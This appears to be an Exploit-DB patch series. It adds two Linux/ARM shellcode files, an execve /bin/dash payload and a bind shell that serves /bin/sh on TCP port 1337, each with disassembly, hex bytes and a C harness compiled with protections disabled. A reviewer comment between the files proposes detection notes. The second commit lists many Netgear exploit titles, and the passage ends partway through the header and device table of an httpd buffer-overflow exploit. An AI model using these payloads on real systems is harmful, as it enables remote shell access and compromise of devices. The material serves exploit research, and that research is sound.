@@ -1021,3 +1021,5 @@ id,file,description,date,author,type,platform 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows 48379,shellcodes/linux/48379.c,"Linux/x64 - Password Protected Bindshell + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux +48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm +48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm diff --git a/shellcodes/arm/48585.c b/shellcodes/arm/48585.c new file mode 100644 index 000000000..86fde7c15 --- /dev/null +++ b/shellcodes/arm/48585.c 
@@ -0,0 +1,81 @@ +# Title: Linux/ARM - execve /bin/dash Shellcode (32 bytes) +# Date: 2020-06-08 +# Category: Shellcode +# Tested: armv7l (32-bit)(Raspberry Pi 2 Model B) (OS: Raspbian Buster Lite) +# Author: Anurag Srivastava +# Description: execve shellcode + +/* +## Objdump + +pi@raspberrypi:~/hex $ objdump -d ed1 + +ed1: file format elf32-littlearm + + +Disassembly of section .text: + +00010054 <_start>: + 10054: e28f3001 add r3, pc, #1 + 10058: e12fff13 bx r3 + 1005c: a002 add r0, pc, #8 ; (adr r0, 10068 <_start+0x14>) + 1005e: 1a49 subs r1, r1, r1 + 10060: 1c0a adds r2, r1, #0 + 10062: 7242 strb r2, [r0, #9] + 10064: 270b movs r7, #11 + 10066: df01 svc 1 + 10068: 6e69622f .word 0x6e69622f + 1006c: 7361642f .word 0x7361642f + 10070: 46c05968 .word 0x46c05968 +pi@raspberrypi:~/hex $ nano ed1.s + +##code + +pi@raspberrypi:~/hex $ cat ed1.s +.section .text +.global _start + +_start: + .ARM + add r3, pc, #1 + bx r3 + + .THUMB + add r0, pc, #8 + sub r1, r1, r1 + mov r2, r1 + strb r2, [r0, #9] + mov r7, #11 + svc #1 + +.ascii "/bin/dashY" + +pi@raspberrypi:~/hex $ as ed1.s -o ex.o +pi@raspberrypi:~/hex $ ld -N ex.o -o exdash +pi@raspberrypi:~/hex $ objcopy -O binary exdash exdash.bin +pi@raspberrypi:~/hex $ hexdump -v -e '"\\""x" 1/1 "%02x" ""' exdash.bin +\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x1a\x0a\x1c\x42\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x64\x61\x73\x68\x59\xc0\x46 + + +## Steps to compile given shellcode C program file +pi@raspberrypi:~ gcc -fno-stack-protector -z execstack tada.c -o tada +pi@raspberrypi:~/hex $ ./tada +Shellcode Length: 32 +$ whoami +pi +$ exit + +*/ + + +#include +#include + +unsigned char shellcode[] = "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x1a\x0a\x1c\x42\x72\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x64\x61\x73\x68\x59\xc0\x46"; +main(){ + + printf("Shellcode Length: %d\n", (int)strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + + ret(); +} \ No newline at end of file 
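Review bot: Neither shellcodes/arm/48585.c nor shellcodes/arm/48586.c explains why the harness is built with `-fno-stack-protector -z execstack`, which is the main thing a defender learns from these files. `main` casts the global `shellcode[]` array to a function pointer and calls it, and on a system that enforces no-execute that call only succeeds when data pages are executable. I would add a comment above `main` in both files such as `/* Test harness only: requires -z execstack; with a non-executable data mapping the call into shellcode[] faults. */`. For 48586.c the title already names the observable behaviour (a listener on 0.0.0.0:1337/TCP that hands the connection to /bin/sh), so a one-line `# Detection:` entry in the header naming that port would make the file more useful for triage.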
diff --git a/shellcodes/arm/48586.c b/shellcodes/arm/48586.c new file mode 100644 index 000000000..25dff5bb7 --- /dev/null +++ b/shellcodes/arm/48586.c 
@@ -0,0 +1,83 @@ +# Title: Linux/ARM (Raspberry Pi) - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes) +# Date: 2020-06-09 +# Architecture: armv6l GNU/Linux +# Website: http://www.theanuragsrivastava.com +# Author: Anurag Srivastava + + +/* + + +bindwala: file format elf32-littlearm + + +Disassembly of section .text: + +00010054 <_start>: + 10054: e28f3001 add r3, pc, #1 + 10058: e12fff13 bx r3 + 1005c: 2001 movs r0, #1 + 1005e: 1c01 adds r1, r0, #0 + 10060: 3001 adds r0, #1 + 10062: 4052 eors r2, r2 + 10064: 27c8 movs r7, #200 ; 0xc8 + 10066: 3751 adds r7, #81 ; 0x51 + 10068: df01 svc 1 + 1006a: 1c04 adds r4, r0, #0 + 1006c: 46c0 nop ; (mov r8, r8) + 1006e: a10e add r1, pc, #56 ; (adr r1, 100a8 ) + 10070: 704a strb r2, [r1, #1] + 10072: 604a str r2, [r1, #4] + 10074: 2210 movs r2, #16 + 10076: 3701 adds r7, #1 + 10078: df01 svc 1 + 1007a: 1c20 adds r0, r4, #0 + 1007c: 2102 movs r1, #2 + 1007e: 187f adds r7, r7, r1 + 10080: df01 svc 1 + 10082: 1c20 adds r0, r4, #0 + 10084: 4049 eors r1, r1 + 10086: 1c0a adds r2, r1, #0 + 10088: 3701 adds r7, #1 + 1008a: df01 svc 1 + 1008c: 1c04 adds r4, r0, #0 + 1008e: 2102 movs r1, #2 + +00010090 : + 10090: 1c20 adds r0, r4, #0 + 10092: 273f movs r7, #63 ; 0x3f + 10094: df01 svc 1 + 10096: 3901 subs r1, #1 + 10098: d5fa bpl.n 10090 + 1009a: a005 add r0, pc, #20 ; (adr r0, 100b0 ) + 1009c: 1a49 subs r1, r1, r1 + 1009e: 1c0a adds r2, r1, #0 + 100a0: 71c1 strb r1, [r0, #7] + 100a2: 270b movs r7, #11 + 100a4: df01 svc 1 + 100a6: 46c0 nop ; (mov r8, r8) + +000100a8 : + 100a8: 3905ff02 .word 0x3905ff02 + 100ac: 01010101 .word 0x01010101 + +000100b0 : + 100b0: 6e69622f .word 0x6e69622f + 100b4: 5868732f .word 0x5868732f +pi@raspberrypi:~/hex $ nano tada.c +pi@raspberrypi:~/hex $ gcc -fno-stack-protector -z execstack tada.c -o tada +pi@raspberrypi:~/hex $ ./tada +Shellcode Length: 100 + +*/ +#include +#include + +unsigned char shellcode[] = 
"\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x01\x20\x01\x1c\x01\x30\x52\x40\xc8\x27\x51\x37\x01\xdf\x04\x1c\xc0\x46\x0e\xa1\x4a\x70\x4a\x60\x10\x22\x01\x37\x01\xdf\x20\x1c\x02\x21\x7f\x18\x01\xdf\x20\x1c\x49\x40\x0a\x1c\x01\x37\x01\xdf\x04\x1c\x02\x21\x20\x1c\x3f\x27\x01\xdf\x01\x39\xfa\xd5\x05\xa0\x49\x1a\x0a\x1c\xc1\x71\x0b\x27\x01\xdf\xc0\x46\x02\xff\x05\x39\x01\x01\x01\x01\x2f\x62\x69\x6e\x2f\x73\x68\x58"; +main(){ + + printf("Shellcode Length: %d\n", (int)strlen(shellcode)); + int (*ret)() = (int(*)())shellcode; + + ret(); +} \ No newline at end of file From 8fc6092de14ce4c4cc89f22c613bf39dc0561e36 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Wed, 17 Jun 2020 05:02:00 +0000 Subject: [PATCH 15/17] DB: 2020-06-17 4 changes to exploits/shellcodes NETGEAR SSL312 Router - Denial of Service Netgear SSL312 Router - Denial of Service NETGEAR WGR614v9 Wireless Router - Denial of Service Netgear WGR614v9 Wireless Router - Denial of Service NETGEAR DG632 Router - Remote Denial of Service Netgear DG632 Router - Remote Denial of Service NETGEAR ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service Netgear ProSafe 1.x - VPN Firewall Web Interface Login Denial of Service NETGEAR ProSafe - Denial of Service Netgear ProSafe - Denial of Service NETGEAR WGR614 - Administration Interface Remote Denial of Service Netgear WGR614 - Administration Interface Remote Denial of Service NETGEAR Genie 2.4.32 - Unquoted Service Path Privilege Escalation Netgear Genie 2.4.32 - Unquoted Service Path Privilege Escalation Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path Outline Service 1.3.3 - 'Outline Service ' Unquoted Service Path Bandwidth Monitor 3.9 - 'Svc10StrikeBandMontitor' Unquoted Service Path NETGEAR WG102 - Leaks SNMP Write Password With Read Access Netgear WG102 - Leaks SNMP Write Password With Read Access NETGEAR DG632 Router - Authentication Bypass Netgear DG632 Router - Authentication Bypass NETGEAR WNR2000 FW 1.2.0.8 - Information Disclosure Netgear WNR2000 FW 1.2.0.8 - Information Disclosure NETGEAR WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) Netgear WG111v2 Wireless Driver - Long Beacon Overflow (Metasploit) NETGEAR FM114P Wireless Firewall - File Disclosure Netgear FM114P Wireless Firewall - File Disclosure NETGEAR FM114P ProSafe Wireless Router - UPnP Information Disclosure Netgear FM114P ProSafe Wireless Router - UPnP Information Disclosure NETGEAR FM114P ProSafe Wireless Router - Rule Bypass Netgear FM114P ProSafe Wireless Router - Rule Bypass NETGEAR RP114 3.26 - Content Filter Bypass Netgear RP114 3.26 - Content Filter Bypass NETGEAR 
DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit) Netgear DGN1000B - 'setup.cgi' Remote Command Execution (Metasploit) NETGEAR DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit) Netgear DGN2200B - 'pppoe.cgi' Remote Command Execution (Metasploit) NETGEAR MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow Netgear MA521 Wireless Driver 5.148.724 - 'Beacon Probe' Remote Buffer Overflow NETGEAR WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow NETGEAR ReadyNAS - Perl Code Evaluation (Metasploit) Netgear ReadyNAS - Perl Code Evaluation (Metasploit) NETGEAR SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting Netgear SSL312 PROSAFE SSL VPN-Concentrator 25 - Error Page Cross-Site Scripting NETGEAR WNR2000 - Multiple Information Disclosure Vulnerabilities Netgear WNR2000 - Multiple Information Disclosure Vulnerabilities NETGEAR WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities Netgear WNDAP350 Wireless Access Point - Multiple Information Disclosure Vulnerabilities NETGEAR D6300B - '/diag.cgi?IPAddr4' Remote Command Execution Netgear D6300B - '/diag.cgi?IPAddr4' Remote Command Execution NETGEAR NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit) Netgear NMS300 ProSafe Network Management System - Arbitrary File Upload (Metasploit) NETGEAR JNR1010 ADSL Router - (Authenticated) Remote File Disclosure NETGEAR WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure Netgear JNR1010 ADSL Router - (Authenticated) Remote File Disclosure Netgear WNR500/WNR612v3/JNR1010/JNR2010 ADSL Router - (Authenticated) Remote File Disclosure NETGEAR WNR2000v5 - Remote Code Execution Netgear WNR2000v5 - Remote Code Execution NETGEAR R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit) Netgear R7000 / R6400 - 'cgi-bin' Command Injection (Metasploit) NETGEAR WNR2000v5 - 
'hidden_lang_avi' Remote Stack Overflow (Metasploit) Netgear WNR2000v5 - 'hidden_lang_avi' Remote Stack Overflow (Metasploit) NETGEAR DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit) Netgear DGN2200 - 'dnslookup.cgi' Command Injection (Metasploit) NETGEAR - 'TelnetEnable' Magic Packet (Metasploit) Netgear - 'TelnetEnable' Magic Packet (Metasploit) WordPress MU < 1.3.2 - active_plugins option Code Execution WordPress MU < 1.3.2 - 'active_plugins' Code Execution NETGEAR Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery Netgear Wireless Cable Modem Gateway - Authentication Bypass / Cross-Site Request Forgery NETGEAR SPH200D - Multiple Vulnerabilities Netgear SPH200D - Multiple Vulnerabilities NETGEAR DGN1000B - Multiple Vulnerabilities Netgear DGN1000B - Multiple Vulnerabilities NETGEAR DGN2200B - Multiple Vulnerabilities Netgear DGN2200B - Multiple Vulnerabilities NETGEAR WNR1000 - Authentication Bypass Netgear WNR1000 - Authentication Bypass NETGEAR WPN824v3 - Unauthorized Configuration Download Netgear WPN824v3 - Unauthorized Configuration Download NETGEAR DGN1000 / DGN2200 - Multiple Vulnerabilities Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities NETGEAR ProSafe - Information Disclosure Netgear ProSafe - Information Disclosure NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) Netgear WNR1000v3 - Password Recovery Credential Disclosure (Metasploit) NETGEAR DGN2200 N300 Wireless Router - Multiple Vulnerabilities Netgear DGN2200 N300 Wireless Router - Multiple Vulnerabilities NETGEAR WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities Netgear WNDR3400 N600 Wireless Dual Band - Multiple Vulnerabilities NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting Netgear DGN2200 1.0.0.29_1.7.29_HotS - Persistent Cross-Site Scripting NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure Netgear DGN2200 1.0.0.29_1.7.29_HotS - Password Disclosure NETGEAR WNR500 Wireless Router - 
'webproc?getpage' Traversal Arbitrary File Access Netgear WNR500 Wireless Router - 'webproc?getpage' Traversal Arbitrary File Access NETGEAR ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure Netgear ReadyNAS LAN /dbbroker 6.2.4 - Credential Disclosure NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation Netgear Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation NETGEAR Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities NETGEAR WNR1000v4 - Authentication Bypass Netgear WNR1000v4 - Authentication Bypass NETGEAR NMS300 ProSafe Network Management System - Multiple Vulnerabilities Netgear NMS300 ProSafe Network Management System - Multiple Vulnerabilities NETGEAR R7000 - Command Injection NETGEAR R7000 - Cross-Site Scripting Netgear R7000 - Command Injection Netgear R7000 - Cross-Site Scripting NETGEAR Routers - Password Disclosure Netgear Routers - Password Disclosure NETGEAR DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution Netgear DGN2200v1/v2/v3/v4 - 'ping.cgi' Remote Command Execution NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution Netgear DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution NETGEAR DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery Netgear DGN2200v1/v2/v3/v4 - Cross-Site Request Forgery Multiple WordPress Plugins - Arbitrary File Upload Multiple WordPress Plugins - Arbitrary File Upload NETGEAR ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution Netgear ReadyNAS Surveillance 1.4.3-16 - Remote Command Execution NETGEAR WiFi Router R6120 - Credential Disclosure Netgear WiFi Router R6120 - Credential Disclosure NETGEAR WiFi Router JWNR2010v5 / R6080 - Authentication Bypass Netgear WiFi Router JWNR2010v5 / R6080 - Authentication Bypass WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting School File 
Management System 1.0 - 'username' SQL Injection School File Management System 1.0 - 'username' SQL Injection ChopSlider3 Wordpress Plugin3.4 - 'id' SQL Injection WordPress Plugin ChopSlider 3.4 - 'id' SQL Injection Wordpress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection Wordpress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) WordPress Plugin Form Maker 5.4.1 - 's' SQL Injection (Authenticated) Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation WordPress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation Joomla J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Joomla! J2 Store 3.3.11 - 'filter_order_Dir' SQL Injection (Authenticated) Netgear R7000 Router - Remote Code Execution Gila CMS 1.11.8 - 'query' SQL Injection
---
exploits/hardware/webapps/48588.py | 3670 +++++++++++++++++++++++++++
exploits/multiple/webapps/48582.txt | 2 +-
exploits/php/webapps/48590.py | 47 +
exploits/windows/local/48591.txt | 20 +
files_exploits.csv | 143 +-
5 files changed, 3811 insertions(+), 71 deletions(-)
create mode 100755 exploits/hardware/webapps/48588.py
create mode 100755 exploits/php/webapps/48590.py
create mode 100644 exploits/windows/local/48591.txt
diff --git a/exploits/hardware/webapps/48588.py b/exploits/hardware/webapps/48588.py
new file mode 100755
index 000000000..881822ade
--- /dev/null
+++ b/exploits/hardware/webapps/48588.py
@@ -0,0 +1,3670 @@
+# EDB Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48588.zip
+#
+# Exploits a pre-authentication memcpy based stack buffer overflow vulnerability
+# in httpd on several devices and versions:
+#
+# Device Version httpd md5sum Exploit status
+# AC1450 V1.0.0.36_10.0.17 c105a629d55d3f7b29d6b88e2cc6ff3a Untested
+# AC1450 V1.0.0.34_10.0.16 b01fa2155dbe3d37c0d244f2a258b797 Untested
+# AC1450 V1.0.0.22_1.0.10 8327b4ccf3c3ea1281f5beb932f308bb Untested
+# AC1450 V1.0.0.14_1.0.6 a199bd85a19fbfe360e967c889fb0a83 Untested
+# AC1450 V1.0.0.8_1.0.4 c1f64b91722efa50452d6842a5e97f77 Untested
+# AC1450 V1.0.0.6_1.0.3 1b043477b16d5bbd2be3d4b7c4430953 Untested
+# D6220 V1.0.0.52_1.0.52 4c63e0a531ddf60310faf99702226c37 Untested
+# D6220 V1.0.0.48_1.0.48 2efa4dfdb0901ffe4b99555e2ddeca32 Untested
+# D6220 V1.0.0.46_1.0.46 2911f178060efcda3644be4bc7f25249 Untested
+# D6220 V1.0.0.44_1.0.44 3ea0dbb8e22d0e4daf3f12d5bb26ab64 Untested
+# D6220 V1.0.0.40_1.0.40 ef47f7085976c65890991eb67bbd31f7 Untested
+# D6220 V1.0.0.36_1.0.36 06c1b6ff9bac3e5c583f71f8cb63bd3a Untested
+# D6220 V1.0.0.34_1.0.34 9a1fcd70a952b63ea874a826793e11ba Untested
+# D6220 V1.0.0.32_1.0.32 5f9b38b2e4afcff3117f3f4d1bc454f4 Untested
+# D6220 V1.1.0.28_1.0.28 5fa7890b766cbd6233043a601bdc990c Untested
+# D6220 V1.0.0.24_1.0.24 1d8cfa4843dd9c4f1b1360beca080a81 Untested
+# D6220 V1.0.0.22_1.0.22 3d1916d41b6e1e728238e5def8723b3e Untested
+# D6220 V1.0.0.16_1.0.16 d5d19a4e7ba57850e4c09a01766cde3a Untested
+# D6300 V1.0.0.102_1.0.102 8dd49d875e2683e396dc67381fadd057 Tested
+# D6300 V1.0.0.96_1.1.96 5caa6056af76330fc0292657f192cb69 Untested
+# D6300 V1.0.0.90_1.0.90 6196e4b48c9337fd5b89f527262f81dc Tested
+# D6300 V1.0.0.88-1.0.88 d65d7d6db8a240bed2c845f9ce5ef8ed Untested
+# D6300 V1.0.0.76_1.0.76 b4c98cc8ff8d9cd3c4a1f65c5c5f0fde Untested
+# D6300 V1.0.0.72_1.0.72 d0690f900a0fa29b38266b04de51869e Untested
+# D6300 V1.0.0.42_1.0.42 e86b7593f1e6d59f49fe4948379d0d69 Untested
+# D6300 V1.0.0.30_1.0.30 f3691a3179fcd7390b62398f365a4c1a Untested
+# D6300 V1.0.0.24_1.0.24 33cad70c5c307950fffded6c8f64066b Untested
+# D6300 V1.0.0.16_1.0.16 55f4d6ac42eff8014254eadce033faac Untested
+# D6400 V1.0.0.88_1.0.88 a9a31bd500dc6542969e039283b4f44f Untested
+# D6400 V1.0.0.86_1.0.86 6ef83c99c829dc7e7d0a0907d3ed71a8 Untested
+# D6400 V1.0.0.82_1.0.82 33c63fc65ecba162e8acbb85bed0dda0 Untested
+# D6400 V1.0.0.80_1.0.80 4d9a3533b6e7afddfb2060649e44d092 Untested
+# D6400 V1.0.0.78_1.0.78 6de4a742f7c7edd7241deda0fdfd5ab4 Untested
+# D6400 V1.0.0.74_1.0.74 e692a2670b133efb293ecc3e3f9c82b4 Untested
+# D6400 V1.0.0.70_1.0.70 a9a0cd9ebb6e45671b03a291f79cfaf0 Untested
+# D6400 V1.0.0.68_1.0.68 226c662ecbf01f524cf0c0537220d652 Untested
+# D6400 V1.0.0.66_1.0.66 a1986e8fe5c270d2e8a3f9416b086a85 Untested
+# D6400 V1.0.0.60_1.0.60 1f74db16784172b4e8b385149b7b730c Untested
+# D6400 V1.0.0.58_1.0.58 e62704fc3cec8611afc65643564943d2 Untested
+# D6400 V1.0.0.56_1.0.56 b02401e956d4160c59a2f59a31da51bc Untested
+# D6400 V1.0.0.54_1.0.54 632e9d26af86341f2eea25248e298b8c Untested
+# D6400 V1.0.0.52_1.0.52 c54e25d1dcd814c44ee29b26337ca140 Untested
+# D6400 V1.0.0.44_1.0.44 9b5cca485ed56ade5cb3d556c8bb975b Untested
+# D6400 V1.0.0.38_1.1.38 b5729e40e61563f7a1a29359e0f9c78c Untested
+# D6400 V1.0.0.34_1.3.34 5628ae2ce9326a63b050e96b6aa3fb79 Untested
+# D6400 V1.0.0.22_1.0.22 1dc99a4d0952f648f1dab07d5cdd2a60 Untested
+# D7000v2 V1.0.0.56_1.0.1 a35f742d1d7ebf7c882fa71bc6cd4d74 Untested
+# D7000v2 V1.0.0.53_1.0.2 27d115ede639511d2eda25114dd82a5b Untested
+# D7000v2 V1.0.0.52_1.0.1 827190546bcae129c56334674af3f669 Untested
+# D7000v2 V1.0.0.51_1.0.1 0583d3f1fd97d3616a9e1448be12ee16 Untested
+# D7000v2 V1.0.0.47_1.0.1 4880a731183fce2b4d47c5064c6d7236 Untested
+# D7000v2 V1.0.0.45_1.0.1 2f1bc9a39d033d10c9ae73c299353524 Untested
+# D7000v2 V1.0.0.44_1.0.1 7d37548ceda1aeb2a163b9616ecfc156 Untested
+# D7000v2 V1.0.0.40_1.0.1 095c32dae5741f5342f5b5aaeeac6206 Untested
+# D7000v2 V1.0.0.38_1.0.1 acca219a67790af0897f8ca6f1bd949f Untested
+# D8500 V1.0.3.44_1.0.1 24352845696378cb0bcef38414d5640a Untested
+# D8500 V1.0.3.43_1.0.1 b71e3b8eb1aedd615aafc9311dd36886 Untested
+# D8500 V1.0.3.42_1.0.1 a567caf426cc76cd11ec3c3053519c8f Untested
+# D8500 V1.0.3.39_1.0.1 ff56ddb8126f5aa1dfc4d85d2eeafce4 Untested
+# D8500 V1.0.3.36_1.0.1 862a04b37c61fa9cadff8754d9f3abb2 Untested
+# D8500 V1.0.3.35_1.0.1 16d4ab7b3357bda7e68a79b5b9022c4d Untested
+# D8500 V1.0.3.28_1.0.1 94bbb72e108e68a774746a97cc7c00c0 Untested
+# D8500 V1.0.3.27_1.0.1 822427e336366dd83c018e541d1d2d4f Untested
+# D8500 V1.0.3.25_1.0.1 ddd3c3f02d1286f26344265d6db1bea5 Untested
+# DC112A V1.0.0.44_1.0.60 e4721b08c70fcdc3dd1048cee49c2118 Untested
+# DC112A V1.0.0.30_1.0.60 c11c0fb597c234e682fbbf3f5ba00d90 Untested
+# DC112A V1.0.0.24_1.0.60 b2b677dff87eab44b4972ff4948532e6 Untested
+# DGN2200 V1.0.0.58_7.0.57 db21e42ca1bf1878192fa7b1627b065a Tested
+# DGN2200 V1.0.0.57_7.0.57 b5e9360ea0411e3e01e2901ec1c14c61 Untested
+# DGN2200 V1.0.0.55_7.0.55 5853a3a4aa466ad491b23d2a59759f67 Untested
+# DGN2200 V1.0.0.52_7.0.52 8286b50e5598cf314aa15d0ce204e36c Untested
+# DGN2200 V1.0.0.50_7.0.50NA 6e37ab74491954b2763bdb6214848045 Untested
+# DGN2200 V1.0.0.36_7.0.36NA 3ab21af915088055bcdfc5ade0af2c2c Untested
+# DGN2200 V1.0.0.36_7.0.36 75a601e25219af4cf8a0c0978a3a1d71 Untested
+# DGN2200v4 V1.0.0.110_1.0.110 5a8772a24aac9d15128bf928d748c1ab Untested
+# DGN2200v4 V1.0.0.108_1.0.108 2ce2f58da92aba784e0d54e2b6ddfc22 Untested
+# DGN2200v4 V1.0.0.102_1.0.102 c7f92c42a258d6e8eadcb9335f25afdb Tested
+# DGN2200v4 V1.0.0.98_1.0.98 ce7f84170d80046146076c0212c46b22 Untested
+# DGN2200v4 V1.0.0.90_1.0.90 fad68b99a9fb2eab63cbfc6b56951d82 Untested
+# DGN2200v4 V1.0.0.86_1.0.86 6a81f9a1c610a9884308d58faf36e5a7 Untested
+# DGN2200v4 V1.0.0.82_1.0.82 adfeaa24b82ff7a9ae3ce4a779f32240 Untested
+# DGN2200v4 V1.0.0.76_1.0.76 6ca6a23431ea41ed6fbb2c71dc6d46f8 Untested
+# DGN2200v4 V1.0.0.66_1.0.66 52e293aea6c51a08be9e00aa653217e2 Untested
+# DGN2200v4 V1.0.0.62_1.0.62 e88ebcec9d158dfaf557c996a6034edc Untested
+# DGN2200v4 V1.0.0.58_1.0.58 a7a3412bc7608971b6a0bf47c95a56d6 Untested
+# DGN2200v4 V1.0.0.46_1.0.46 603daa3cedb8c6269257416c27f1e55b Untested
+# DGN2200v4 V1.0.0.24_5.0.8 a9151f0c434e6b27135b628a8cf51134 Untested
+# DGN2200v4 V1.0.0.5_5.0.3 4668835a74ecab6333889d7efe171361 Untested
+# DGN2200M V1.0.0.37_1.0.21WW 87fbe2fa75d8acdee8022f71629d7d79 Tested
+# DGN2200M V1.0.0.35_1.0.21WW ffd47e9d882ce4f3de11df49ce7a535b Tested
+# DGN2200M V1.0.0.35_1.0.21NA a8edc9e918fde432f6979af0ea77aeb6 Untested
+# DGN2200M V1.0.0.33_1.0.21WW 6868b9bd17a5a47c739c0bf68dc04875 Untested
+# DGN2200M V1.0.0.33_1.0.21NA d8ddd5aef65509ee95239135aa3dfc71 Untested
+# DGN2200M V1.0.0.26_1.0.20WW b2942e856d5690962d7b39d585d63c2d Untested
+# DGN2200M V1.0.0.24_1.0.20NA 3cf45d175d4151dadd8d2823b7222121 Untested
+# DGND3700 V1.0.0.17_1.0.17 b103c87de279c008bfd9793fb808125e Untested
+# DGND3700 V1.0.0.17_1.0.17NA d88c70428a629ae3a899628e4d0d7f2c Untested
+# DGND3700 V1.0.0.12_1.0.12 83fabbde0e49ab07a5ab77a94a5dd0d4 Untested
+# DGND3700 V1.0.0.12_1.0.12NA c6735900e4239a2a474f82fea6b2bf2f Untested
+# EX3700 V1.0.0.78_1.0.51 456b1fdd776007c0999a6b5cc85ea4e0 Untested
+# EX3700 V1.0.0.76_1.0.49 cd4e4e9179569fafa3c406cf48d4ee2c Untested
+# EX3700 V1.0.0.72_1.0.47 3556b3a666c781dbed7d6d6304ae34b5 Untested
+# EX3700 V1.0.0.70_1.0.46 a0e1573c0e8dbd9ae43ab07e1e4bddd7 Untested
+# EX3700 V1.0.0.68_1.0.45 d26b6062d6e75fee8109e67572cdcc26 Untested
+# EX3700 V1.0.0.64_1.0.43 d665edd51692e539592b5e1667eef22c Untested
+# EX3700 V1.0.0.62_1.0.42 9e753ac547229b6a3df28f03115a8d31 Untested
+# EX3700 V1.0.0.58_1.0.38 67ab1cac6cbf6d074cea95fadca461ab Untested
+# EX3700 V1.0.0.50_1.0.30 26bf966c3dc6143f126ccc6d4e016b0b Untested
+# EX3700 V1.0.0.48_1.0.28 df8012bd7cf20db8592aaacf6b634691 Untested
+# EX3700 V1.0.0.46_1.0.26 e9416497850099b1f851d52bbb5f520c Untested
+# EX3700 V1.0.0.44_1.0.22 30323764937bae52d93184f3b521783a Untested
+# EX3700 V1.0.0.34_1.0.22 37c8368144211c8f73d7be9a9f6dacb2 Untested
+# EX3700 V1.0.0.28_1.0.20 d7e6b85d140f09f08ce3129dc88918c2 Untested
+# EX3700 V1.0.0.26_1.0.19 bc0c9df4ed9424c0d3b94bf78db594c0 Untested
+# EX3700 V1.0.0.24_1.0.18 64e7797362fe0b58c4eb71758b8fa5bf Untested
+# EX3700 V1.0.0.22_1.0.17 ee6f11943d1cd33f87f6fddd01917f96 Untested
+# EX3800 V1.0.0.78_1.0.51 456b1fdd776007c0999a6b5cc85ea4e0 Untested
+# EX3800 V1.0.0.76_1.0.49 cd4e4e9179569fafa3c406cf48d4ee2c Untested
+# EX3800 V1.0.0.72_1.0.47 3556b3a666c781dbed7d6d6304ae34b5 Untested
+# EX3800 V1.0.0.70_1.0.46 a0e1573c0e8dbd9ae43ab07e1e4bddd7 Untested
+# EX3800 V1.0.0.68_1.0.45 d26b6062d6e75fee8109e67572cdcc26 Untested
+# EX3800 V1.0.0.64_1.0.43 d665edd51692e539592b5e1667eef22c Untested
+# EX3800 V1.0.0.62_1.0.42 9e753ac547229b6a3df28f03115a8d31 Untested
+# EX3800 V1.0.0.58_1.0.38 67ab1cac6cbf6d074cea95fadca461ab Untested
+# EX3800 V1.0.0.50_1.0.30 26bf966c3dc6143f126ccc6d4e016b0b Untested
+# EX3800 V1.0.0.48_1.0.28 df8012bd7cf20db8592aaacf6b634691 Untested
+# EX3800 V1.0.0.46_1.0.26 e9416497850099b1f851d52bbb5f520c Untested
